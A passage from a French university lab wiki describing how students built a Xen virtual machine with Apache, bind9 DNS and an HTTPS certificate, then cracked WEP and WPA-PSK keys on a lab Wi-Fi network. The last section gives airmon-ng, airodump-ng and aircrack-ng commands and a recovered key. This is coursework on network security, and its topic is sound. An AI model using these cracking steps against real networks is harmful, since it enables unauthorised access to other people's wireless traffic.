il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
	&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/db.ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
   ;&lt;br /&gt;
   ; BIND data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL    604800&lt;br /&gt;
   @       IN      SOA     dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (  &amp;lt;= METTRE UNE ADRESSE BIDON , pas necessaire&lt;br /&gt;
                           21112019        ; Serial&lt;br /&gt;
                            604800         ; Refresh&lt;br /&gt;
                             86400         ; Retry&lt;br /&gt;
                           2419200         ; Expire&lt;br /&gt;
                            604800 )       ; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
   @       IN      NS      dns.ima2a5-rex4ever.site.  &amp;lt;= DN du site &lt;br /&gt;
   @       IN      NS      ns6.gandi.net.&amp;lt;= DNS de gandi&lt;br /&gt;
   dns     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE DNS&lt;br /&gt;
   www     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE SITE&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    SSLCACertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.pem&amp;quot;&lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
'''Note :''' Comme vous aurez pu le remarquer, j'ai créer un dossier certificate dans lequel j'ai mis le .cer,le .csr,le.key et le .pem afin de ne pas les perdre.&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA-PSK ===&lt;br /&gt;
De même que précedemment, on recommence en changeant le --encrypt et on obtient :&lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wpa wlan0mon &lt;br /&gt;
On obtient les informations suivantes sur notre réseau cible : &lt;br /&gt;
Channel: 2&lt;br /&gt;
SSIDName: kracotte03&lt;br /&gt;
BSSIDAdress: 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
On peut alors espionner et voler des informations avec les '''handshakes''':&lt;br /&gt;
airodump-ng -w kracotte03 -c 2 --bssid 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
'''-w kracotte03''' indique que l'on souhaite tout enregistrer dans un fichier nommé '''kracotte03.'''. On obtient alors après un moment les datas volées et les informations sont extraites sous plusieurs formats. &lt;br /&gt;
Le format '''.cap''' est compatible avec l'utilitaire que nous allons utiliser, on le copie donc sur une clef USB et on va cracker la clef sur une zabeth (vitesse de calcul plus elevée).&lt;br /&gt;
